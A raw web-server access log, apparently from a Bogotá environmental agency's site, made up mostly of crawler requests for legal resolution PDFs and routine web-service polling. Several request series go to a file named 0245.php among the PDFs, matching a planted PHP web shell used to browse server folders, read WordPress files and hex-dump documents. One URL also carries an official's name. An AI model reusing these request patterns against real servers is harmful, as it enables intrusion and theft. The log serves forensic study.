40.77.167.5 - - [25/Jun/2024:06:36:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%20301%20AL%20400/RESOLUCION%200311%20DE%202007.pdf HTTP/1.1" 200 403688
66.249.66.19 - - [25/Jun/2024:06:36:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202012/1081.pdf HTTP/1.1" 200 435221
66.249.66.19 - - [25/Jun/2024:06:36:46 -0500] "GET /BLA/resoluciones/AUTOS%202020/2658.pdf HTTP/1.1" 200 375182
201.245.192.253 - - [25/Jun/2024:06:37:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [25/Jun/2024:06:37:29 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38832
201.245.192.253 - - [25/Jun/2024:06:37:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36860
201.245.192.253 - - [25/Jun/2024:06:38:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [25/Jun/2024:06:36:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [25/Jun/2024:06:38:30 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [25/Jun/2024:06:38:39 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-606-15.docx HTTP/1.1" 200 26698
172.22.2.4 - - [25/Jun/2024:06:38:41 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [25/Jun/2024:06:38:41 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [25/Jun/2024:06:38:41 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [25/Jun/2024:06:38:41 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [25/Jun/2024:06:38:41 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
172.22.2.4 - - [25/Jun/2024:06:38:41 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [25/Jun/2024:06:38:41 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [25/Jun/2024:06:38:41 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [25/Jun/2024:06:38:41 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [25/Jun/2024:06:38:42 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
216.245.221.92 - - [25/Jun/2024:06:39:04 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [25/Jun/2024:06:37:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
201.245.192.253 - - [25/Jun/2024:06:39:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
69.171.231.9 - - [25/Jun/2024:06:39:33 -0500] "GET /distrito-habilita-tres-caminos-en-los-cerros-orientales-para-bienestar-fisico-y-emocional-de-los-ciudadanos.html HTTP/1.1" 200 1033
201.245.192.253 - - [25/Jun/2024:06:39:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36857
69.63.184.9 - - [25/Jun/2024:06:39:38 -0500] "GET /images/01052024%20Nota%20apertura%20senderos%20Cerros.jpeg HTTP/1.1" 200 130671
40.77.189.150 - - [25/Jun/2024:06:40:07 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
201.245.192.253 - - [25/Jun/2024:06:40:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [25/Jun/2024:06:40:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36860
216.244.66.195 - - [25/Jun/2024:06:40:30 -0500] "GET /robots.txt HTTP/1.1" 404 1018
201.245.192.253 - - [25/Jun/2024:06:41:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [25/Jun/2024:06:42:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.20 - - [25/Jun/2024:06:42:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/RESOLUCION%20326%20DE%202010.PDF HTTP/1.1" 200 31656
47.128.122.179 - - [25/Jun/2024:06:42:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cbogotacumbredelclima%5Cwp-admin%5C&f=install.php&ft=code&white=1 HTTP/1.1" 200 5316
47.128.122.20 - - [25/Jun/2024:06:43:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cautodeclaracion22%5C&f=residuos.php&ft=html&white=1 HTTP/1.1" 200 1245
47.128.122.20 - - [25/Jun/2024:06:43:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/bootstrap.min.css HTTP/1.1" 404 1422
47.128.122.20 - - [25/Jun/2024:06:43:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/jquery.min.js HTTP/1.1" 404 1422
66.249.66.19 - - [25/Jun/2024:06:43:14 -0500] "GET /resoluciones/RESOLUCIONES%202008/3902.pdf HTTP/1.1" 404 1018
201.245.192.253 - - [25/Jun/2024:06:43:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [25/Jun/2024:06:43:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
47.128.43.213 - - [25/Jun/2024:06:43:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-admin%5Cuser%5C&f=freedoms.php&ft=html&white=1 HTTP/1.1" 200 203
47.128.122.165 - - [25/Jun/2024:06:43:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.122.165 - - [25/Jun/2024:06:43:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.122.165 - - [25/Jun/2024:06:43:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.122.165 - - [25/Jun/2024:06:43:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_pdf HTTP/1.1" 200 1034
47.128.122.165 - - [25/Jun/2024:06:43:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.122.165 - - [25/Jun/2024:06:43:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.122.165 - - [25/Jun/2024:06:43:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.122.165 - - [25/Jun/2024:06:43:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.122.165 - - [25/Jun/2024:06:43:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.122.165 - - [25/Jun/2024:06:43:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
216.245.221.92 - - [25/Jun/2024:06:44:04 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [25/Jun/2024:06:42:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [25/Jun/2024:06:44:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.17.170 - - [25/Jun/2024:06:44:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_flv HTTP/1.1" 200 1034
47.128.17.170 - - [25/Jun/2024:06:44:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.17.170 - - [25/Jun/2024:06:44:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.17.170 - - [25/Jun/2024:06:44:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.17.170 - - [25/Jun/2024:06:44:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.17.170 - - [25/Jun/2024:06:44:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.17.170 - - [25/Jun/2024:06:44:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.17.170 - - [25/Jun/2024:06:44:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.17.170 - - [25/Jun/2024:06:44:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.17.170 - - [25/Jun/2024:06:44:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.122.165 - - [25/Jun/2024:06:43:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3931.pdf&ft=info&fullhexdump=1 HTTP/1.1" 200 696022
47.128.17.170 - - [25/Jun/2024:06:44:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cvideos%5C&f=NuestraGente_EducadoresAmb.flv&ft=html HTTP/1.1" 200 5078742
172.22.2.4 - - [25/Jun/2024:06:43:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 40647
172.22.2.4 - - [25/Jun/2024:06:43:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 43983
201.245.192.253 - - [25/Jun/2024:06:45:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
52.15.147.27 - - [25/Jun/2024:06:46:08 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [25/Jun/2024:06:46:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.20 - - [25/Jun/2024:06:46:31 -0500] "GET /BLA/resoluciones/AUTOS%202020/2788.pdf HTTP/1.1" 200 317277
66.249.66.21 - - [25/Jun/2024:06:46:32 -0500] "GET /BLA/resoluciones/AUTOS%202020/4704.pdf HTTP/1.1" 200 391230
66.249.66.21 - - [25/Jun/2024:06:46:32 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202023/0388.pdf HTTP/1.1" 304 -
66.249.66.20 - - [25/Jun/2024:06:47:10 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/6041.pdf HTTP/1.1" 200 44165
201.245.192.253 - - [25/Jun/2024:06:47:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.19 - - [25/Jun/2024:06:47:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/6693.pdf HTTP/1.1" 200 2355573
201.245.192.253 - - [25/Jun/2024:06:48:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [25/Jun/2024:06:48:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.21 - - [25/Jun/2024:06:48:32 -0500] "GET /autoliquidacion/Solicitudes%20relacionadas%20con%20calidad%20del%20aire%20auditiva%20y%20visual/Evaluaci%C3%B3n%20para%20Certificaci%C3%B3n%20en%20materia%20de%20Revisi%C3%B3n%20de%20Gases/Solicitud%20Certificacion%20(Revision%20Gases).pdf HTTP/1.1" 304 -
216.245.221.92 - - [25/Jun/2024:06:49:04 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [25/Jun/2024:06:49:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.19 - - [25/Jun/2024:06:49:32 -0500] "GET /BLA/resoluciones/AUTOS%202020/2968.pdf HTTP/1.1" 200 374072
172.22.2.4 - - [25/Jun/2024:06:47:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [25/Jun/2024:06:48:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [25/Jun/2024:06:50:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [25/Jun/2024:06:49:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52358
201.245.192.253 - - [25/Jun/2024:06:51:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
52.167.144.235 - - [25/Jun/2024:06:52:02 -0500] "GET /BLA/resoluciones/AUTOS%202020/2596.pdf HTTP/1.1" 200 329977
201.245.192.253 - - [25/Jun/2024:06:52:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [25/Jun/2024:06:53:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [25/Jun/2024:06:53:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [25/Jun/2024:06:54:04 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [25/Jun/2024:06:54:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [25/Jun/2024:06:55:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [25/Jun/2024:06:54:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.76 - - [25/Jun/2024:06:55:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/1081.pdf HTTP/1.1" 304 -
201.245.192.253 - - [25/Jun/2024:06:56:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [25/Jun/2024:06:55:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52358
201.245.192.253 - - [25/Jun/2024:06:57:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
157.55.39.58 - - [25/Jun/2024:06:57:51 -0500] "GET /BLA/resoluciones/AUTOS%202023/2423.pdf HTTP/1.1" 304 -
201.245.192.253 - - [25/Jun/2024:06:58:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [25/Jun/2024:06:58:19 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
201.245.192.253 - - [25/Jun/2024:06:58:23 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.19 - - [25/Jun/2024:06:58:33 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202024/0676.pdf HTTP/1.1" 304 -
201.245.192.253 - - [25/Jun/2024:06:58:36 -0500] "POST /appsia/controlador HTTP/1.1" 200 5437
201.245.192.253 - - [25/Jun/2024:06:58:40 -0500] "POST /appsia/controlador HTTP/1.1" 200 7787
201.245.192.253 - - [25/Jun/2024:06:58:49 -0500] "POST /appsia/controlador HTTP/1.1" 200 6652
201.245.192.253 - - [25/Jun/2024:06:58:53 -0500] "POST /appsia/controlador HTTP/1.1" 200 10607
201.245.192.253 - - [25/Jun/2024:06:58:57 -0500] "POST /appsia/controlador HTTP/1.1" 200 75865
216.245.221.92 - - [25/Jun/2024:06:59:04 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [25/Jun/2024:06:59:14 -0500] "POST /appsia/controlador HTTP/1.1" 200 75865
201.245.192.253 - - [25/Jun/2024:06:59:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [25/Jun/2024:07:00:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [25/Jun/2024:07:00:27 -0500] "GET /appsia/controlador?comando=regresar&id=19260115&funcionario=JOSE+VICENTE+CONTRERAS+MOJICA&desde=19260115&hasta=19260115&version=19260115 HTTP/1.1" 200 7787
201.245.192.253 - - [25/Jun/2024:07:00:34 -0500] "POST /appsia/controlador HTTP/1.1" 200 6652
201.245.192.253 - - [25/Jun/2024:07:00:35 -0500] "POST /appsia/controlador HTTP/1.1" 200 10974
201.245.192.253 - - [25/Jun/2024:07:00:39 -0500] "POST /appsia/controlador HTTP/1.1" 200 75890
201.245.192.253 - - [25/Jun/2024:07:01:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [25/Jun/2024:07:00:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [25/Jun/2024:07:02:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [25/Jun/2024:07:00:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
201.245.192.253 - - [25/Jun/2024:07:03:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [25/Jun/2024:07:03:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [25/Jun/2024:07:04:04 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [25/Jun/2024:07:04:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [25/Jun/2024:07:04:20 -0500] "GET /BLA/resoluciones/AUTOS%202016/0192.pdf HTTP/1.1" 200 439176
216.244.66.195 - - [25/Jun/2024:07:05:06 -0500] "GET /BLA/resoluciones/AUTOS%202016/0491.pdf HTTP/1.1" 200 781600
201.245.192.253 - - [25/Jun/2024:07:05:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
40.77.167.76 - - [25/Jun/2024:07:05:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4488.pdf HTTP/1.1" 200 1626201
216.244.66.195 - - [25/Jun/2024:07:06:05 -0500] "GET /BLA/resoluciones/AUTOS%202016/0715.pdf HTTP/1.1" 200 321696
201.245.192.253 - - [25/Jun/2024:07:06:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [25/Jun/2024:07:06:47 -0500] "GET /BLA/resoluciones/AUTOS%202016/1003.pdf HTTP/1.1" 200 677787
201.245.192.253 - - [25/Jun/2024:07:07:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [25/Jun/2024:07:05:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [25/Jun/2024:07:07:37 -0500] "GET /BLA/resoluciones/AUTOS%202016/1013.pdf HTTP/1.1" 200 481053
201.245.192.253 - - [25/Jun/2024:07:08:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [25/Jun/2024:07:08:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [25/Jun/2024:07:06:42 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56779
216.244.66.195 - - [25/Jun/2024:07:08:27 -0500] "GET /BLA/resoluciones/AUTOS%202016/1086.pdf HTTP/1.1" 200 499696
47.128.119.232 - - [25/Jun/2024:07:08:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.119.232 - - [25/Jun/2024:07:08:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.119.232 - - [25/Jun/2024:07:08:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.119.232 - - [25/Jun/2024:07:08:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_pdf HTTP/1.1" 200 1034
47.128.119.232 - - [25/Jun/2024:07:08:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.119.232 - - [25/Jun/2024:07:08:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.119.232 - - [25/Jun/2024:07:08:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.119.232 - - [25/Jun/2024:07:08:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.119.232 - - [25/Jun/2024:07:08:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.119.232 - - [25/Jun/2024:07:08:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
172.22.2.4 - - [25/Jun/2024:07:08:45 -0500] "GET /BLA/boletinlegal/Circulares/2021/CIRCULAR%20No.%2000009%20DEL%2001%20DE%20OCTUBRE%20DEL%202021.pdf HTTP/1.1" 304 -
47.128.119.232 - - [25/Jun/2024:07:08:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2331.pdf&ft=info&fullhexdump=1 HTTP/1.1" 200 716502
216.245.221.92 - - [25/Jun/2024:07:09:04 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [25/Jun/2024:07:09:12 -0500] "GET /BLA/resoluciones/AUTOS%202016/1224.pdf HTTP/1.1" 200 478268
201.245.192.253 - - [25/Jun/2024:07:09:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [25/Jun/2024:07:09:59 -0500] "GET /BLA/resoluciones/AUTOS%202016/1237.pdf HTTP/1.1" 200 330052
201.245.192.253 - - [25/Jun/2024:07:10:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.19 - - [25/Jun/2024:07:10:33 -0500] "GET /BLA/resoluciones/AUTOS%202020/2581.pdf HTTP/1.1" 200 383356
66.249.66.19 - - [25/Jun/2024:07:10:34 -0500] "GET /BLA/resoluciones/AUTOS%202020/3738.pdf HTTP/1.1" 200 268778
216.244.66.195 - - [25/Jun/2024:07:10:38 -0500] "GET /BLA/resoluciones/AUTOS%202016/1254.pdf HTTP/1.1" 200 327194
17.241.75.186 - - [25/Jun/2024:07:11:09 -0500] "GET /bogota-construccion-sostenible-reconocio-los-disenos-de-proyectos-constructivos-que-generaran-un-impacto-positivo-al-ambiente-en-la-ciudad.html HTTP/1.1" 200 872
216.244.66.195 - - [25/Jun/2024:07:11:16 -0500] "GET /BLA/resoluciones/AUTOS%202016/1722.pdf HTTP/1.1" 200 470914
201.245.192.253 - - [25/Jun/2024:07:11:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [25/Jun/2024:07:11:59 -0500] "GET /BLA/resoluciones/AUTOS%202016/1741.pdf HTTP/1.1" 200 300841
47.128.124.109 - - [25/Jun/2024:07:12:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.124.109 - - [25/Jun/2024:07:12:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.124.109 - - [25/Jun/2024:07:12:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.124.109 - - [25/Jun/2024:07:12:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.124.109 - - [25/Jun/2024:07:12:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.124.109 - - [25/Jun/2024:07:12:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_tif HTTP/1.1" 200 175
47.128.124.109 - - [25/Jun/2024:07:12:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.124.109 - - [25/Jun/2024:07:12:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.124.109 - - [25/Jun/2024:07:12:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.124.109 - - [25/Jun/2024:07:12:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.116.152 - - [25/Jun/2024:07:12:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-content%5Cthemes%5Ctwentyfourteen%5C&f=footer.php&white=1 HTTP/1.1" 200 590
201.245.192.253 - - [25/Jun/2024:07:12:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.124.109 - - [25/Jun/2024:07:11:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2000%5C&f=2000+250-299.tif&ft=info&fullhexdump=1 HTTP/1.1" 200 4161238
216.244.66.195 - - [25/Jun/2024:07:12:34 -0500] "GET /BLA/resoluciones/AUTOS%202016/1837.pdf HTTP/1.1" 200 472413
47.128.123.64 - - [25/Jun/2024:07:12:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.123.64 - - [25/Jun/2024:07:12:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.123.64 - - [25/Jun/2024:07:12:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.123.64 - - [25/Jun/2024:07:12:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_flv HTTP/1.1" 200 1034
47.128.123.64 - - [25/Jun/2024:07:12:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.123.64 - - [25/Jun/2024:07:12:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.123.64 - - [25/Jun/2024:07:12:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.123.64 - - [25/Jun/2024:07:12:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.123.64 - - [25/Jun/2024:07:12:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.123.64 - - [25/Jun/2024:07:12:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
172.22.2.4 - - [25/Jun/2024:07:12:46 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1037
172.22.2.4 - - [25/Jun/2024:07:12:46 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20ANALISIS%20SENTENCIA%20C-554%20DE%202007.doc HTTP/1.1" 304 -
47.128.123.64 - - [25/Jun/2024:07:12:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cvideos%5C&f=SpotCarneSilvestre_HD_Finalparamedios.flv&ft=info&fullhexdump=1 HTTP/1.1" 200 7323350
216.244.66.195 - - [25/Jun/2024:07:13:09 -0500] "GET /BLA/resoluciones/AUTOS%202016/2002.pdf HTTP/1.1" 200 381838
201.245.192.253 - - [25/Jun/2024:07:13:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [25/Jun/2024:07:13:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
